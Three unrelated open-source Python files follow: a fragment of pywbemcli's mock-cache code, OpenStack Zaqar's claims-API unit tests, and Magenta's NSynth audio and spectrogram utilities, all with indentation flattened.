self (pywbem_mock.FakedWBEMConnection): The mock connection.
        mockenv_pickle_file (string): Path name of the mockenv
pickle file.
file_path_list (list of string): The path names of the input files
for building the mock environment, from the connection definition.
Raises:
NotCacheable (py<3.5): Mock environment is not cacheable.
"""
# Restore the provider classes
for file_path in file_path_list:
ext = os.path.splitext(file_path)[1]
if ext == '.py':
# May raise mockscripts.NotCacheable which will be handled by
# the caller by building the mock env.
mockscripts.import_script(file_path)
# Restore the provider registry and the CIM repository
with io.open(mockenv_pickle_file, 'rb') as fp:
mockenv = pickle.load(fp)
# Others have references to the self._cimrepository object, so we are
# not replacing that object, but are rather replacing the state of
# that object.
cimrepository = mockenv['cimrepository']
assert isinstance(cimrepository, pywbem_mock.InMemoryRepository)
# pylint: disable=protected-access
self._cimrepository.load(cimrepository)
provider_registry = mockenv['provider_registry']
assert isinstance(provider_registry, pywbem_mock.ProviderRegistry)
# pylint: disable=protected-access
self._provider_registry.load(provider_registry)
@staticmethod
def _dump_depreg(depreg, depreg_pickle_file):
"""
Dump a provider dependent registry to a pickle file.
Parameters:
depreg (pywbem_mock.ProviderDependentRegistry): Provider dependent
registry to be dumped.
depreg_pickle_file (string): Path name of the pickle file.
"""
with io.open(depreg_pickle_file, 'wb') as fp:
pickle.dump(depreg, fp)
@staticmethod
def _load_depreg(depreg_pickle_file):
"""
Load a provider dependent registry from a pickle file and return it.
Parameters:
depreg_pickle_file (string): Path name of the pickle file to be
loaded.
Returns:
pywbem_mock.ProviderDependentRegistry: Provider dependent registry.
"""
with io.open(depreg_pickle_file, 'rb') as fp:
depreg = pickle.load(fp)
return depreg
class PYWBEMCLIConnection(pywbem.WBEMConnection, PYWBEMCLIConnectionMixin):
"""
    pywbem.WBEMConnection subclass that adds the methods provided by
    PYWBEMCLIConnectionMixin.
"""
def __init__(self, *args, **kwargs):
"""
ctor passes all input parameters to superclass
"""
super(PYWBEMCLIConnection, self).__init__(*args, **kwargs)
class PYWBEMCLIFakedConnection(BuildMockenvMixin,
PYWBEMCLIConnectionMixin,
pywbem_mock.FakedWBEMConnection):
"""
    pywbem_mock.FakedWBEMConnection subclass that adds the mock environment
    build methods and the methods provided by PYWBEMCLIConnectionMixin.
"""
def __init__(self, *args, **kwargs):
"""
ctor passes all input parameters to superclass
"""
super(PYWBEMCLIFakedConnection, self).__init__(*args, **kwargs)
def mockcache_rootdir():
"""
Return the directory path of the mock cache root directory.
"""
dir_path = os.path.join(os.path.expanduser('~'), '.pywbemcli_mockcache')
return dir_path
def mockcache_cachedir(rootdir, connections_file, connection_name):
"""
Return the directory path of the mock cache directory for a connection.
"""
# Construct a (reproducible) cache ID from connections file path and
# connection definition name.
# Example: 6048a3da1a34a3ec605825a1493c7bb5.simple
try:
connections_file = os.path.relpath(
connections_file, os.path.expanduser('~'))
except ValueError:
# On Windows, os.path.relpath() raises ValueError when the paths
# are on different drives
pass
md5 = hashlib.md5()
md5.update(connections_file.encode("utf-8"))
cache_id = "{}.{}".format(md5.hexdigest(), connection_name)
dir_path = os.path.join(rootdir, cache_id)
return dir_path
def delete_mock_cache(connections_file, connection_name):
"""
Delete the mock cache of the connection, if it exists.
Parameters:
connections_file (string): Path name of the connections file.
connection_name (string): The name of the connection definition in
the connections file.
Raises:
OSError: Mock cache cannot be deleted.
"""
cache_dir = mockcache_cachedir(
mockcache_rootdir(), connections_file, connection_name)
if os.path.isdir(cache_dir):
file_list = glob.glob(os.path.join(cache_dir, '*'))
for _file in file_list:
os.remove(_file)
os.rmdir(cache_dir)
|
|
# Copyright (c) 2013 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
from unittest import mock
import ddt
import falcon
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
from testtools import matchers
from zaqar import tests as testing
from zaqar.tests.unit.transport.wsgi import base
@ddt.ddt
class TestClaimsMongoDB(base.V1Base):
config_file = 'wsgi_mongodb.conf'
@testing.requires_mongodb
def setUp(self):
super(TestClaimsMongoDB, self).setUp()
self.project_id = '480924'
self.queue_path = self.url_prefix + '/queues/fizbit'
self.claims_path = self.queue_path + '/claims'
self.messages_path = self.queue_path + '/messages'
doc = '{"_ttl": 60}'
self.simulate_put(self.queue_path, self.project_id, body=doc)
self.assertEqual(falcon.HTTP_201, self.srmock.status)
doc = jsonutils.dumps([{'body': 239, 'ttl': 300}] * 10)
self.simulate_post(self.queue_path + '/messages', self.project_id,
body=doc, headers={'Client-ID':
uuidutils.generate_uuid()})
self.assertEqual(falcon.HTTP_201, self.srmock.status)
def tearDown(self):
storage = self.boot.storage._storage
control = self.boot.control
connection = storage.connection
connection.drop_database(control.queues_database)
for db in storage.message_databases:
connection.drop_database(db)
self.simulate_delete(self.queue_path, self.project_id)
super(TestClaimsMongoDB, self).tearDown()
@ddt.data(None, '[', '[]', '{}', '.', '"fail"')
def test_bad_claim(self, doc):
self.simulate_post(self.claims_path, self.project_id, body=doc)
self.assertEqual(falcon.HTTP_400, self.srmock.status)
href = self._get_a_claim()
self.simulate_patch(href, self.project_id, body=doc)
self.assertEqual(falcon.HTTP_400, self.srmock.status)
def test_exceeded_claim(self):
self.simulate_post(self.claims_path, self.project_id,
body='{"ttl": 100, "grace": 60}',
query_string='limit=21')
self.assertEqual(falcon.HTTP_400, self.srmock.status)
@ddt.data((-1, -1), (59, 60), (60, 59), (60, 43201), (43201, 60))
def test_unacceptable_ttl_or_grace(self, ttl_grace):
ttl, grace = ttl_grace
self.simulate_post(self.claims_path, self.project_id,
body=jsonutils.dumps({'ttl': ttl, 'grace': grace}))
self.assertEqual(falcon.HTTP_400, self.srmock.status)
@ddt.data(-1, 59, 43201)
def test_unacceptable_new_ttl(self, ttl):
href = self._get_a_claim()
self.simulate_patch(href, self.project_id,
body=jsonutils.dumps({'ttl': ttl}))
self.assertEqual(falcon.HTTP_400, self.srmock.status)
def _get_a_claim(self):
doc = '{"ttl": 100, "grace": 60}'
self.simulate_post(self.claims_path, self.project_id, body=doc)
return self.srmock.headers_dict['Location']
def test_lifecycle(self):
doc = '{"ttl": 100, "grace": 60}'
# First, claim some messages
body = self.simulate_post(self.claims_path, self.project_id, body=doc)
self.assertEqual(falcon.HTTP_201, self.srmock.status)
claimed = jsonutils.loads(body[0])
claim_href = self.srmock.headers_dict['Location']
message_href, params = claimed[0]['href'].split('?')
# No more messages to claim
self.simulate_post(self.claims_path, self.project_id, body=doc,
query_string='limit=3')
self.assertEqual(falcon.HTTP_204, self.srmock.status)
headers = {
'Client-ID': uuidutils.generate_uuid(),
}
# Listing messages, by default, won't include claimed
body = self.simulate_get(self.messages_path, self.project_id,
headers=headers)
self.assertEqual(falcon.HTTP_204, self.srmock.status)
# Include claimed messages this time
body = self.simulate_get(self.messages_path, self.project_id,
query_string='include_claimed=true',
headers=headers)
listed = jsonutils.loads(body[0])
self.assertEqual(falcon.HTTP_200, self.srmock.status)
self.assertEqual(len(claimed), len(listed['messages']))
now = timeutils.utcnow() + datetime.timedelta(seconds=10)
timeutils_utcnow = 'oslo_utils.timeutils.utcnow'
with mock.patch(timeutils_utcnow) as mock_utcnow:
mock_utcnow.return_value = now
body = self.simulate_get(claim_href, self.project_id)
claim = jsonutils.loads(body[0])
self.assertEqual(falcon.HTTP_200, self.srmock.status)
self.assertEqual(claim_href,
self.srmock.headers_dict['Content-Location'])
self.assertEqual(100, claim['ttl'])
# NOTE(cpp-cabrera): verify that claim age is non-negative
self.assertThat(claim['age'], matchers.GreaterThan(-1))
# Try to delete the message without submitting a claim_id
self.simulate_delete(message_href, self.project_id)
self.assertEqual(falcon.HTTP_403, self.srmock.status)
# Delete the message and its associated claim
self.simulate_delete(message_href, self.project_id,
query_string=params)
self.assertEqual(falcon.HTTP_204, self.srmock.status)
# Try to get it from the wrong project
self.simulate_get(message_href, 'bogus_project', query_string=params)
self.assertEqual(falcon.HTTP_404, self.srmock.status)
# Get the message
self.simulate_get(message_href, self.project_id, query_string=params)
self.assertEqual(falcon.HTTP_404, self.srmock.status)
# Update the claim
new_claim_ttl = '{"ttl": 60}'
creation = timeutils.utcnow()
self.simulate_patch(claim_href, self.project_id, body=new_claim_ttl)
self.assertEqual(falcon.HTTP_204, self.srmock.status)
# Get the claimed messages (again)
body = self.simulate_get(claim_href, self.project_id)
query = timeutils.utcnow()
claim = jsonutils.loads(body[0])
message_href, params = claim['messages'][0]['href'].split('?')
self.assertEqual(60, claim['ttl'])
estimated_age = timeutils.delta_seconds(creation, query)
self.assertGreater(estimated_age, claim['age'])
# Delete the claim
self.simulate_delete(claim['href'], 'bad_id')
self.assertEqual(falcon.HTTP_204, self.srmock.status)
self.simulate_delete(claim['href'], self.project_id)
self.assertEqual(falcon.HTTP_204, self.srmock.status)
# Try to delete a message with an invalid claim ID
self.simulate_delete(message_href, self.project_id,
query_string=params)
self.assertEqual(falcon.HTTP_400, self.srmock.status)
# Make sure it wasn't deleted!
self.simulate_get(message_href, self.project_id, query_string=params)
self.assertEqual(falcon.HTTP_200, self.srmock.status)
# Try to get a claim that doesn't exist
self.simulate_get(claim['href'])
self.assertEqual(falcon.HTTP_404, self.srmock.status)
# Try to update a claim that doesn't exist
self.simulate_patch(claim['href'], body=doc)
self.assertEqual(falcon.HTTP_404, self.srmock.status)
def test_post_claim_nonexistent_queue(self):
path = self.url_prefix + '/queues/nonexistent/claims'
self.simulate_post(path, self.project_id,
body='{"ttl": 100, "grace": 60}')
self.assertEqual(falcon.HTTP_204, self.srmock.status)
def test_get_claim_nonexistent_queue(self):
path = self.url_prefix + '/queues/nonexistent/claims/aaabbbba'
self.simulate_get(path)
self.assertEqual(falcon.HTTP_404, self.srmock.status)
# NOTE(cpp-cabrera): regression test against bug #1203842
def test_get_nonexistent_claim_404s(self):
self.simulate_get(self.claims_path + '/a')
self.assertEqual(falcon.HTTP_404, self.srmock.status)
def test_delete_nonexistent_claim_204s(self):
self.simulate_delete(self.claims_path + '/a')
self.assertEqual(falcon.HTTP_204, self.srmock.status)
def test_patch_nonexistent_claim_404s(self):
patch_data = jsonutils.dumps({'ttl': 100})
self.simulate_patch(self.claims_path + '/a', body=patch_data)
self.assertEqual(falcon.HTTP_404, self.srmock.status)
class TestClaimsFaultyDriver(base.V1BaseFaulty):
config_file = 'wsgi_faulty.conf'
def test_simple(self):
project_id = '480924'
claims_path = self.url_prefix + '/queues/fizbit/claims'
doc = '{"ttl": 100, "grace": 60}'
self.simulate_post(claims_path, project_id, body=doc)
self.assertEqual(falcon.HTTP_503, self.srmock.status)
self.simulate_get(claims_path + '/nichts', project_id)
self.assertEqual(falcon.HTTP_503, self.srmock.status)
self.simulate_patch(claims_path + '/nichts', project_id, body=doc)
self.assertEqual(falcon.HTTP_503, self.srmock.status)
self.simulate_delete(claims_path + '/foo', project_id)
self.assertEqual(falcon.HTTP_503, self.srmock.status)
|
|
# Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for NSynth."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib
import os
import librosa
import numpy as np
from six.moves import range # pylint: disable=redefined-builtin
import tensorflow as tf
slim = tf.contrib.slim
def shell_path(path):
return os.path.abspath(os.path.expanduser(os.path.expandvars(path)))
#===============================================================================
# WaveNet Functions
#===============================================================================
def get_module(module_path):
"""Imports module from NSynth directory.
Args:
module_path: Path to module separated by dots, e.g. "configs.linear".
Returns:
module: Imported module.
"""
import_path = "magenta.models.nsynth."
module = importlib.import_module(import_path + module_path)
return module
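# Minimal usage sketch, using the example path from the docstring above:
#   config = get_module("configs.linear")  # imports magenta.models.nsynth.configs.linear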
def load_audio(path, sample_length=64000, sr=16000):
"""Loading of a wave file.
Args:
path: Location of a wave file to load.
sample_length: The truncated total length of the final wave file.
sr: Sample rate, in samples per second.
Returns:
out: The audio in samples from -1.0 to 1.0
"""
audio, _ = librosa.load(path, sr=sr)
audio = audio[:sample_length]
return audio
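# Usage sketch (the path below is hypothetical): load 4 seconds of 16 kHz mono audio.
#   samples = load_audio("/tmp/example.wav", sample_length=64000, sr=16000)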
def mu_law(x, mu=255, int8=False):
"""A TF implementation of Mu-Law encoding.
Args:
x: The audio samples to encode.
mu: The Mu to use in our Mu-Law.
int8: Use int8 encoding.
Returns:
out: The Mu-Law encoded int8 data.
"""
out = tf.sign(x) * tf.log(1 + mu * tf.abs(x)) / np.log(1 + mu)
out = tf.floor(out * 128)
if int8:
out = tf.cast(out, tf.int8)
return out
def inv_mu_law(x, mu=255):
"""A TF implementation of inverse Mu-Law.
Args:
x: The Mu-Law samples to decode.
mu: The Mu we used to encode these samples.
Returns:
out: The decoded data.
"""
x = tf.cast(x, tf.float32)
out = (x + 0.5) * 2. / (mu + 1)
out = tf.sign(out) / mu * ((1 + mu)**tf.abs(out) - 1)
out = tf.where(tf.equal(x, 0), x, out)
return out
def inv_mu_law_numpy(x, mu=255.0):
"""A numpy implementation of inverse Mu-Law.
Args:
x: The Mu-Law samples to decode.
mu: The Mu we used to encode these samples.
Returns:
out: The decoded data.
"""
x = np.array(x).astype(np.float32)
out = (x + 0.5) * 2. / (mu + 1)
out = np.sign(out) / mu * ((1 + mu)**np.abs(out) - 1)
out = np.where(np.equal(x, 0), x, out)
return out
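# Usage sketch: mu_law()/inv_mu_law() are TF ops, while inv_mu_law_numpy() works
# directly on arrays; a quantized value of 0 decodes back to exactly 0.0.
#   decoded = inv_mu_law_numpy(np.array([0, 64, -64]))  # floats roughly in [-1.0, 1.0]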
def trim_for_encoding(wav_data, sample_length, hop_length=512):
"""Make sure audio is a even multiple of hop_size.
Args:
wav_data: 1-D or 2-D array of floats.
sample_length: Max length of audio data.
hop_length: Pooling size of WaveNet autoencoder.
Returns:
wav_data: Trimmed array.
sample_length: Length of trimmed array.
"""
if wav_data.ndim == 1:
# Max sample length is the data length
if sample_length > wav_data.size:
sample_length = wav_data.size
# Multiple of hop_length
sample_length = (sample_length // hop_length) * hop_length
# Trim
wav_data = wav_data[:sample_length]
# Assume all examples are the same length
elif wav_data.ndim == 2:
# Max sample length is the data length
if sample_length > wav_data[0].size:
sample_length = wav_data[0].size
# Multiple of hop_length
sample_length = (sample_length // hop_length) * hop_length
# Trim
wav_data = wav_data[:, :sample_length]
return wav_data, sample_length
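# Usage sketch: a 1000-sample clip with the default hop_length of 512 is trimmed
# to the largest multiple of 512 that fits.
#   trimmed, length = trim_for_encoding(np.zeros(1000), sample_length=64000)
#   # trimmed.shape == (512,), length == 512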
#===============================================================================
# Baseline Functions
#===============================================================================
#---------------------------------------------------
# Pre/Post-processing
#---------------------------------------------------
def get_optimizer(learning_rate, hparams):
"""Get the tf.train.Optimizer for this optimizer string.
Args:
learning_rate: The learning_rate tensor.
hparams: TF.HParams object with the optimizer and momentum values.
Returns:
optimizer: The tf.train.Optimizer based on the optimizer string.
"""
return {
"rmsprop":
tf.train.RMSPropOptimizer(
learning_rate,
decay=0.95,
momentum=hparams.momentum,
epsilon=1e-4),
"adam":
tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-8),
"adagrad":
tf.train.AdagradOptimizer(learning_rate, initial_accumulator_value=1.0),
"mom":
tf.train.MomentumOptimizer(learning_rate, momentum=hparams.momentum),
"sgd":
tf.train.GradientDescentOptimizer(learning_rate)
}.get(hparams.optimizer)
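# Usage sketch (assumes hparams exposes .optimizer and .momentum, as the
# docstring states; momentum is ignored by "adam" but must still be present,
# since every optimizer in the dict above is constructed eagerly):
#   hparams = tf.contrib.training.HParams(optimizer="adam", momentum=0.9)
#   opt = get_optimizer(1e-4, hparams)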
def specgram(audio,
n_fft=512,
hop_length=None,
mask=True,
log_mag=True,
re_im=False,
dphase=True,
mag_only=False):
"""Spectrogram using librosa.
Args:
audio: 1-D array of float32 sound samples.
n_fft: Size of the FFT.
hop_length: Stride of FFT. Defaults to n_fft/2.
mask: Mask the phase derivative by the magnitude.
log_mag: Use the logamplitude.
re_im: Output Real and Imag. instead of logMag and dPhase.
dphase: Use derivative of phase instead of phase.
mag_only: Don't return phase.
Returns:
specgram: [n_fft/2 + 1, audio.size / hop_length, 2]. The first channel is
the logamplitude and the second channel is the derivative of phase.
"""
if not hop_length:
hop_length = int(n_fft / 2.)
fft_config = dict(
n_fft=n_fft, win_length=n_fft, hop_length=hop_length, center=True)
spec = librosa.stft(audio, **fft_config)
if re_im:
re = spec.real[:, :, np.newaxis]
im = spec.imag[:, :, np.newaxis]
spec_real = np.concatenate((re, im), axis=2)
else:
mag, phase = librosa.core.magphase(spec)
phase_angle = np.angle(phase)
# Magnitudes, scaled 0-1
if log_mag:
mag = (librosa.power_to_db(
mag**2, amin=1e-13, top_db=120., ref=np.max) / 120.) + 1
else:
mag /= mag.max()
if dphase:
# Derivative of phase
phase_unwrapped = np.unwrap(phase_angle)
p = phase_unwrapped[:, 1:] - phase_unwrapped[:, :-1]
p = np.concatenate([phase_unwrapped[:, 0:1], p], axis=1) / np.pi
else:
# Normal phase
p = phase_angle / np.pi
# Mask the phase
if log_mag and mask:
p = mag * p
# Return Mag and Phase
p = p.astype(np.float32)[:, :, np.newaxis]
mag = mag.astype(np.float32)[:, :, np.newaxis]
if mag_only:
spec_real = mag[:, :, np.newaxis]
else:
spec_real = np.concatenate((mag, p), axis=2)
return spec_real
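# Usage sketch: with the defaults the output stacks log-magnitude and the phase
# derivative on the last axis, shaped [n_fft/2 + 1, n_frames, 2].
#   spec = specgram(np.random.randn(16000).astype(np.float32))  # -> (257, n_frames, 2)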
def inv_magphase(mag, phase_angle):
phase = np.cos(phase_angle) + 1.j * np.sin(phase_angle)
return mag * phase
def griffin_lim(mag, phase_angle, n_fft, hop, num_iters):
"""Iterative algorithm for phase retrieval from a magnitude spectrogram.
Args:
mag: Magnitude spectrogram.
phase_angle: Initial condition for phase.
n_fft: Size of the FFT.
hop: Stride of FFT. Defaults to n_fft/2.
num_iters: Griffin-Lim iterations to perform.
Returns:
audio: 1-D array of float32 sound samples.
"""
fft_config = dict(n_fft=n_fft, win_length=n_fft, hop_length=hop, center=True)
ifft_config = dict(win_length=n_fft, hop_length=hop, center=True)
complex_specgram = inv_magphase(mag, phase_angle)
for i in range(num_iters):
audio = librosa.istft(complex_specgram, **ifft_config)
if i != num_iters - 1:
complex_specgram = librosa.stft(audio, **fft_config)
_, phase = librosa.magphase(complex_specgram)
phase_angle = np.angle(phase)
complex_specgram = inv_magphase(mag, phase_angle)
return audio
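# Usage sketch: recover audio from a magnitude-only spectrogram by starting from
# a random phase (this is what ispecgram() below does when mag_only=True).
#   phase0 = np.pi * np.random.rand(*mag.shape)
#   audio = griffin_lim(mag, phase0, n_fft=512, hop=256, num_iters=100)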
def ispecgram(spec,
n_fft=512,
hop_length=None,
mask=True,
log_mag=True,
re_im=False,
dphase=True,
mag_only=True,
num_iters=1000):
"""Inverse Spectrogram using librosa.
Args:
spec: 3-D specgram array [freqs, time, (mag_db, dphase)].
n_fft: Size of the FFT.
hop_length: Stride of FFT. Defaults to n_fft/2.
mask: Reverse the mask of the phase derivative by the magnitude.
log_mag: Use the logamplitude.
re_im: Output Real and Imag. instead of logMag and dPhase.
dphase: Use derivative of phase instead of phase.
mag_only: Specgram contains no phase.
num_iters: Number of griffin-lim iterations for mag_only.
Returns:
audio: 1-D array of sound samples. Peak normalized to 1.
"""
if not hop_length:
hop_length = n_fft // 2
ifft_config = dict(win_length=n_fft, hop_length=hop_length, center=True)
if mag_only:
mag = spec[:, :, 0]
phase_angle = np.pi * np.random.rand(*mag.shape)
elif re_im:
spec_real = spec[:, :, 0] + 1.j * spec[:, :, 1]
else:
mag, p = spec[:, :, 0], spec[:, :, 1]
if mask and log_mag:
p /= (mag + 1e-13 * np.random.randn(*mag.shape))
if dphase:
# Roll up phase
phase_angle = np.cumsum(p * np.pi, axis=1)
else:
phase_angle = p * np.pi
# Magnitudes
if log_mag:
mag = (mag - 1.0) * 120.0
mag = 10**(mag / 20.0)
phase = np.cos(phase_angle) + 1.j * np.sin(phase_angle)
spec_real = mag * phase
if mag_only:
audio = griffin_lim(
mag, phase_angle, n_fft, hop_length, num_iters=num_iters)
else:
audio = librosa.core.istft(spec_real, **ifft_config)
return np.squeeze(audio / audio.max())
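# Round-trip sketch: specgram() followed by ispecgram() approximately reconstructs
# the (peak-normalized) waveform when the phase channel is kept; pass
# mag_only=False, since the default here is magnitude-only Griffin-Lim.
#   spec = specgram(audio)
#   recon = ispecgram(spec, mag_only=False)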
def batch_specgram(audio,
n_fft=512,
hop_length=None,
mask=True,
log_mag=True,
re_im=False,
dphase=True,
mag_only=False):
"""Computes specgram in a batch."""
assert len(audio.shape) == 2
batch_size = audio.shape[0]
res = []
for b in range(batch_size):
res.append(
specgram(audio[b], n_fft, hop_length, mask, log_mag, re_im, dphase,
mag_only))
return np.array(res)
def batch_ispecgram(spec,
n_fft=512,
hop_length=None,
mask=True,
log_mag=True,
re_im=False,
dphase=True,
mag_only=False,
num_iters=1000):
"""Computes inverse specgram in a batch."""
assert len(spec.shape) == 4
batch_size = spec.shape[0]
res = []
for b in range(batch_size):
res.append(
ispecgram(spec[b, :, :, :], n_fft, hop_length, mask, log_mag, re_im,
dphase, mag_only, num_iters))
return np.array(res)
def tf_specgram(audio,
n_fft=512,
hop_length=None,
mask=True,
log_mag=True,
re_im=False,
dphase=True,
mag_only=False):
"""Specgram tensorflow op (uses pyfunc)."""
return tf.py_func(batch_specgram, [
audio, n_fft, hop_length, mask, log_mag, re_im, dphase, mag_only
], tf.float32)
def tf_ispecgram(spec,
n_fft=512,
hop_length=None,
mask=True,
pad=True,
log_mag=True,
re_im=False,
dphase=True,
mag_only=False,
num_iters=1000):
"""Inverted Specgram tensorflow op (uses pyfunc)."""
dims = spec.get_shape().as_list()
# Add back in nyquist frequency
if pad:
x = tf.concat([spec, tf.zeros([dims[0], 1, dims[2], dims[3]])], 1)
else:
x = spec
audio = tf.py_func(batch_ispecgram, [
x, n_fft, hop_length, mask, log_mag, re_im, dphase, mag_only, num_iters
], tf.float32)
return audio
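# Note: both tf_specgram() and tf_ispecgram() wrap the numpy/librosa batch
# implementations above via tf.py_func, so they run in the Python process on
# CPU and do not provide gradients.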
#---------------------------------------------------
# Summaries
#---------------------------------------------------
def form_image_grid(input_tensor, grid_shape, image_shape, num_channels):
"""Arrange a minibatch of images into a grid to form a single image.
Args:
input_tensor: Tensor. Minibatch of images to format, either 4D
([batch size, height, width, num_channels]) or flattened
([batch size, height * width * num_channels]).
grid_shape: Sequence of int. The shape of the image grid,
formatted as [grid_height, grid_width].
image_shape: Sequence of int. The shape of a single image,
formatted as [image_height, image_width].
num_channels: int. The number of channels in an image.
Returns:
Tensor representing a single image in which the input images have been
arranged into a grid.
Raises:
ValueError: The grid shape and minibatch size don't match, or the image
shape and number of channels are incompatible with the input tensor.
"""
if grid_shape[0] * grid_shape[1] != int(input_tensor.get_shape()[0]):
raise ValueError("Grid shape incompatible with minibatch size.")
if len(input_tensor.get_shape()) == 2:
num_features = image_shape[0] * image_shape[1] * num_channels
if int(input_tensor.get_shape()[1]) != num_features:
raise ValueError("Image shape and number of channels incompatible with "
"input tensor.")
elif len(input_tensor.get_shape()) == 4:
if (int(input_tensor.get_shape()[1]) != image_shape[0] or
int(input_tensor.get_shape()[2]) != image_shape[1] or
int(input_tensor.get_shape()[3]) != num_channels):
raise ValueError("Image shape and number of channels incompatible with "
"input tensor.")
else:
raise ValueError("Unrecognized input tensor format.")
height, width = grid_shape[0] * image_shape[0], grid_shape[1] * image_shape[1]
input_tensor = tf.reshape(input_tensor,
grid_shape + image_shape + [num_channels])
input_tensor = tf.transpose(input_tensor, [0, 1, 3, 2, 4])
input_tensor = tf.reshape(
input_tensor, [grid_shape[0], width, image_shape[0], num_channels])
input_tensor = tf.transpose(input_tensor, [0, 2, 1, 3])
input_tensor = tf.reshape(input_tensor, [1, height, width, num_channels])
return input_tensor
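# Usage sketch: 16 single-channel 32x32 images arranged into a 4x4 grid yield one
# [1, 128, 128, 1] tensor suitable for tf.summary.image.
#   grid = form_image_grid(tf.zeros([16, 32, 32, 1]), [4, 4], [32, 32], 1)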
def specgram_summaries(spec,
name,
hparams,
rows=4,
columns=4,
image=True,
phase=True,
audio=True):
"""Post summaries of a specgram (Image and Audio).
For image summaries, creates a rows x columns composite image from the batch.
Also can create audio summaries for raw audio, but hparams.raw_audio must be
True.
Args:
spec: Batch of spectrograms.
name: String prepended to summaries.
hparams: Hyperparameters.
rows: Int, number of rows in image.
columns: Int, number of columns in image.
image: Bool, create image summary.
phase: Bool, create image summary from second channel in the batch.
audio: Bool, create audio summaries for each spectrogram in the batch.
"""
batch_size, n_freq, n_time, unused_channels = spec.get_shape().as_list()
# Must divide minibatch evenly
b = min(batch_size, rows * columns)
if hparams.raw_audio:
spec = tf.squeeze(spec)
spec /= tf.expand_dims(tf.reduce_max(spec, axis=1), axis=1)
tf.summary.audio(
name, tf.squeeze(spec), hparams.samples_per_second, max_outputs=b)
else:
if image:
if b % columns != 0:
rows = np.floor(np.sqrt(b))
columns = rows
else:
rows = b / columns
tf.summary.image("Mag/%s" % name,
form_image_grid(spec[:b, :, :, :1], [rows, columns],
[n_freq, n_time], 1))
if phase:
tf.summary.image("Phase/%s" % name,
form_image_grid(spec[:b, :, :, 1:], [rows, columns],
[n_freq, n_time], 1))
if audio:
tf.summary.audio(
name,
tf_ispecgram(
spec,
n_fft=hparams.n_fft,
hop_length=hparams.hop_length,
mask=hparams.mask,
log_mag=hparams.log_mag,
pad=hparams.pad,
re_im=hparams.re_im,
dphase=hparams.dphase,
mag_only=hparams.mag_only),
hparams.samples_per_second,
max_outputs=b)
def calculate_softmax_and_summaries(logits, one_hot_labels, name):
"""Calculate the softmax cross entropy loss and associated summaries.
Args:
logits: Tensor of logits, first dimension is batch size.
one_hot_labels: Tensor of one hot encoded categorical labels. First
dimension is batch size.
name: Name to use as prefix for summaries.
Returns:
loss: Dimensionless tensor representing the mean negative
log-probability of the true class.
"""
loss = tf.nn.softmax_cross_entropy_with_logits(
logits=logits, labels=one_hot_labels)
loss = tf.reduce_mean(loss)
softmax_summaries(loss, logits, one_hot_labels, name)
return loss
def calculate_sparse_softmax_and_summaries(logits, labels, name):
"""Calculate the softmax cross entropy loss and associated summaries.
Args:
logits: Tensor of logits, first dimension is batch size.
labels: Tensor of categorical labels [ints]. First
dimension is batch size.
name: Name to use as prefix for summaries.
Returns:
loss: Dimensionless tensor representing the mean negative
log-probability of the true class.
"""
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits, labels=labels)
loss = tf.reduce_mean(loss)
softmax_summaries(loss, logits, labels, name)
return loss
def softmax_summaries(loss, logits, one_hot_labels, name="softmax"):
"""Create the softmax summaries for this cross entropy loss.
Args:
loss: Cross-entropy loss.
logits: The [batch_size, classes] float tensor representing the logits.
one_hot_labels: The float tensor representing actual class ids. If this is
[batch_size, classes], then we take the argmax of it first.
name: Prepended to summary scope.
"""
tf.summary.scalar(name + "_loss", loss)
one_hot_labels = tf.cond(
tf.equal(tf.rank(one_hot_labels),
2), lambda: tf.to_int32(tf.argmax(one_hot_labels, 1)),
lambda: tf.to_int32(one_hot_labels))
in_top_1 = tf.nn.in_top_k(logits, one_hot_labels, 1)
tf.summary.scalar(name + "_precision@1",
tf.reduce_mean(tf.to_float(in_top_1)))
in_top_5 = tf.nn.in_top_k(logits, one_hot_labels, 5)
tf.summary.scalar(name + "_precision@5",
tf.reduce_mean(tf.to_float(in_top_5)))
def calculate_l2_and_summaries(predicted_vectors, true_vectors, name):
"""Calculate L2 loss and associated summaries.
Args:
predicted_vectors: Tensor of predictions, first dimension is batch size.
true_vectors: Tensor of labels, first dimension is batch size.
name: Name to use as prefix for summaries.
Returns:
loss: Dimensionless tensor representing the mean euclidean distance
between true and predicted.
"""
loss = tf.reduce_mean((predicted_vectors - true_vectors)**2)
tf.summary.scalar(name + "_loss", loss)
tf.summary.scalar(
name + "_prediction_mean_squared_norm",
tf.reduce_mean(tf.nn.l2_loss(predicted_vectors)))
tf.summary.scalar(
name + "_label_mean_squared_norm",
tf.reduce_mean(tf.nn.l2_loss(true_vectors)))
return loss
def frequency_weighted_cost_mask(peak=10.0, hz_flat=1000, sr=16000, n_fft=512):
"""Calculates a mask to weight lower frequencies higher.
Piecewise linear approximation. Assumes magnitude is in log scale.
Args:
peak: Cost increase at 0 Hz.
hz_flat: Hz at which cost increase is 0.
sr: Sample rate.
n_fft: FFT size.
Returns:
Constant tensor [1, N_freq, 1] of cost weighting.
"""
n = int(n_fft / 2)
cutoff = np.where(
librosa.core.fft_frequencies(sr=sr, n_fft=n_fft) >= hz_flat)[0][0]
mask = np.concatenate([np.linspace(peak, 1.0, cutoff), np.ones(n - cutoff)])
return tf.constant(mask[np.newaxis, :, np.newaxis], dtype=tf.float32)
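# Usage sketch: weight a spectrogram loss so that errors below ~1 kHz cost up to
# 10x more; the [1, 256, 1] result broadcasts against a [batch, freq, time] loss.
#   mask = frequency_weighted_cost_mask(peak=10.0, hz_flat=1000, sr=16000, n_fft=512)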
#---------------------------------------------------
# Neural Nets
#---------------------------------------------------
